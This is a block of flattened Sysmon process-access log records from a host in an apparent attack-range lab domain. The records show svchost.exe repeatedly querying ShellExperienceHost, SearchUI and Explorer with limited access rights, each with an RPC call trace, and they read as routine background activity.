07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 